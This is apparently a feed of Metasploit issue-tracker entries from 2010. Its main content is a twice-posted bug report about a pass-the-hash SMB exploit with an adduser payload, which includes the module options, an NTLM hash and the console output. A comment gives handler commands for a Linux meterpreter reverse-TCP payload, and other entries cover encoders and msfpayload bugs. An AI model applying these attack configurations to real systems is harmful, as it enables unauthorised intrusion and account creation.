http://www.metasploit.com/redmine/ 2010-09-01T20:15:37-07:00 Metasploit Redmine Interface Redmine http://www.metasploit.com/redmine/issues/2482 2010-09-01T20:15:37-07:00 john grisham <p>Hi,</p> <p>I was trying the above exploit using a NTLM hash to exploit and then deploying windows adduser payload<br />Connection (445) was established between the attacking machine and the target machine.<br />However, the account was not created on the target machine. Is this exploit limited to the kinds of payload we can deploy?</p> <p>Note: I have physical access to both machine, and on the targetted machine, the account was not created although a 445 session was established between the attacking and target machine.</p> <p>Name Current Setting Required Description<br />---- --------------- -------- -----------<br />RHOST 10.10.10.10 yes The target address<br />RPORT 445 yes Set the SMB service port<br />SMBDomain WORKGROUP no The Windows domain to use for authentication<br />SMBPass 00000000000000000000000000000000:E3D386D6673369E87139D020D653218E no The password for the specified username<br />SMBUser Administrator no The username to authenticate as</p> <p>Payload options (windows/adduser):</p> <p>Name Current Setting Required Description<br /> ---- --------------- -------- -----------<br /> EXITFUNC process yes Exit technique: seh, thread, process<br /> PASS test123 yes The password for this user<br /> USER test123 yes The username to create</p> <p>[*] Connecting to the server...<br />[*] Authenticating as user 'ADministrator'...<br />[*] Uploading payload...<br />[*] Created \DkysLinS.exe...<br />[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...<br />[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...<br />[*] Obtaining a service manager handle...<br />[*] Creating a new service (hjTkQCQp - "MrsMgvquMqVIwuWWTZLIAlXkQPCB")...<br />[*] Closing service handle...<br />[*] Opening service...<br />[*] Starting the service...<br />[*] Removing the service...<br />[*] Closing service handle...<br />[*] Deleting \DkysLinS.exe...<br />[*] Exploit completed, but no session was created.</p> <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/2g0fr1B0O8k" height="1" width="1"/> http://www.metasploit.com/redmine/issues/2482 http://www.metasploit.com/redmine/issues/2481 2010-09-01T19:02:55-07:00 Jeremy Faircloth <p>When using the O option, msfpayload responds by generating the raw output of the payload. e.g. "./msfpayload /windows/shell_bind_tcp O" in prior versions would show which options are available for the payload. The same result (raw output)is obtained using the S option.</p> <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/_E2XL28XrKE" height="1" width="1"/> http://www.metasploit.com/redmine/issues/2481 http://www.metasploit.com/redmine/projects/framework/repository/revisions/10216 2010-09-01T16:26:35-07:00 Tod Beardsley todb@metasploit.com <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/FFEl9qwMZO4" height="1" width="1"/> http://www.metasploit.com/redmine/projects/framework/repository/revisions/10216 http://www.metasploit.com/redmine/issues/2480 2010-09-01T15:47:08-07:00 Devon Kearns <p>Since the Alpha3 Encoder apparently has a smaller decoder and the additional encoding options, it could be a good addition to MSF.</p> <p><a class="external" href="http://code.google.com/p/alpha3/">http://code.google.com/p/alpha3/</a><br />"The improvements over ALPHA2 include new encodings (x86 lowercase ascii and x64 mixedcase ascii) and smaller decoders for various other encodings."</p> <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/356Rcg0-Gic" height="1" width="1"/> http://www.metasploit.com/redmine/issues/2480 http://www.metasploit.com/redmine/projects/framework/repository/revisions/10214 2010-09-01T15:40:07-07:00 Tod Beardsley todb@metasploit.com <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/hQ6qvpYlFsw" height="1" width="1"/> http://www.metasploit.com/redmine/projects/framework/repository/revisions/10214 http://www.metasploit.com/redmine/projects/framework/repository/revisions/10213 2010-09-01T15:06:52-07:00 Tod Beardsley todb@metasploit.com <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/zWhqxUsWTV8" height="1" width="1"/> http://www.metasploit.com/redmine/projects/framework/repository/revisions/10213 http://www.metasploit.com/redmine/issues/2306#change-9322 2010-09-01T02:26:10-07:00 Jonathan Salwan <p>Hi Joshua,</p> <p>Try with new attached file.</p> <p>regards,</p> <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/m_fG8f8sBFs" height="1" width="1"/> http://www.metasploit.com/redmine/issues/2306#change-9322 http://www.metasploit.com/redmine/issues/2474#change-9321 2010-09-01T02:26:02-07:00 john grisham <p>Revision 10155</p> <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/rLnoy7oE7QM" height="1" width="1"/> http://www.metasploit.com/redmine/issues/2474#change-9321 http://www.metasploit.com/redmine/issues/2474 2010-09-01T01:54:44-07:00 john grisham <p>Hi,</p> <p>I was trying the above exploit using a NTLM hash to exploit and then deploying windows adduser payload<br />Connection (445) was established between the attacking machine and the target machine. <br />However, the account was not created on the target machine. Is this exploit limited to the kinds of payload we can deploy?</p> <p>Note: I have physical access to both machine, and on the targetted machine, the account was not created although a 445 session was established between the attacking and target machine.</p> <p>Name Current Setting Required Description<br /> ---- --------------- -------- -----------<br /> RHOST 10.10.10.10 yes The target address<br /> RPORT 445 yes Set the SMB service port<br /> SMBDomain WORKGROUP no The Windows domain to use for authentication<br /> SMBPass 00000000000000000000000000000000:E3D386D6673369E87139D020D653218E no The password for the specified username<br /> SMBUser Administrator no The username to authenticate as</p> <pre><code>Payload options (windows/adduser):</code></pre> <pre><code>Name Current Setting Required Description<br /> ---- --------------- -------- -----------<br /> EXITFUNC process yes Exit technique: seh, thread, process<br /> PASS test123 yes The password for this user<br /> USER test123 yes The username to create</code></pre> <p>[*] Connecting to the server...<br />[*] Authenticating as user 'ADministrator'...<br />[*] Uploading payload...<br />[*] Created \DkysLinS.exe...<br />[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...<br />[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:10.10.10.10[\svcctl] ...<br />[*] Obtaining a service manager handle...<br />[*] Creating a new service (hjTkQCQp - "MrsMgvquMqVIwuWWTZLIAlXkQPCB")...<br />[*] Closing service handle...<br />[*] Opening service...<br />[*] Starting the service...<br />[*] Removing the service...<br />[*] Closing service handle...<br />[*] Deleting \DkysLinS.exe...<br />[*] Exploit completed, but no session was created.</p> <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/42KXXjnKiJ0" height="1" width="1"/> http://www.metasploit.com/redmine/issues/2474 http://www.metasploit.com/redmine/issues/2418#change-9319 2010-08-31T23:36:18-07:00 philip sanderson <p>ext_server_stdapi.so needs to go to data/meterpreter/ext_server_stdapi.so<br />msflinker.bin needs to go to data/msflinker_linux_x86.bin (see modules/payloads/stages/linux/x86/meterpreter.rb)</p> <p>msflinker = raw binary. will default to 127.0.0.1:4444, so you can test it with</p> <pre> use multi/handler set PAYLOAD linux/x86/metsvc_reverse_tcp set LHOST 127.0.0.1 exploit </pre> <pre> ./msflinker </pre> <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/Qv0vQKcnWKE" height="1" width="1"/> http://www.metasploit.com/redmine/issues/2418#change-9319 http://www.metasploit.com/redmine/issues/2418#change-9318 2010-08-31T20:35:31-07:00 philip sanderson <p>I will go through the build process information in the documentation I wrote to see what's missing / could be improved. As for automating it completely, that should be possible.</p> <p>What distribution are you building on? I'm using ubuntu 10.04.</p> <p>I'll attach binaries shortly</p> <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/jtcDU4z62Pw" height="1" width="1"/> http://www.metasploit.com/redmine/issues/2418#change-9318 http://www.metasploit.com/redmine/projects/framework/repository/revisions/10211 2010-08-31T18:57:22-07:00 Chris Gates <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/w0K6E8ZmDfg" height="1" width="1"/> http://www.metasploit.com/redmine/projects/framework/repository/revisions/10211 http://www.metasploit.com/redmine/projects/framework/repository/revisions/10210 2010-08-31T18:49:06-07:00 Chris Gates <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/zB7p7it8mYU" height="1" width="1"/> http://www.metasploit.com/redmine/projects/framework/repository/revisions/10210 http://www.metasploit.com/redmine/projects/framework/repository/revisions/10209 2010-08-31T18:43:48-07:00 Chris Gates <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/rp8lm2o1vwk" height="1" width="1"/> http://www.metasploit.com/redmine/projects/framework/repository/revisions/10209 http://www.metasploit.com/redmine/issues/2465#change-9317 2010-08-31T16:24:57-07:00 scriptjunkie - <p>Applied in changeset <a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/10207" class="changeset" title="Initialize framework after forking when running msfrpcd as a daemon. Fixes #2465 by running datab...">r10207</a>.</p> <img src="http://feeds.feedburner.com/~r/metasploit/development/~4/1U33cSsaqGU" height="1" width="1"/> http://www.metasploit.com/redmine/issues/2465#change-9317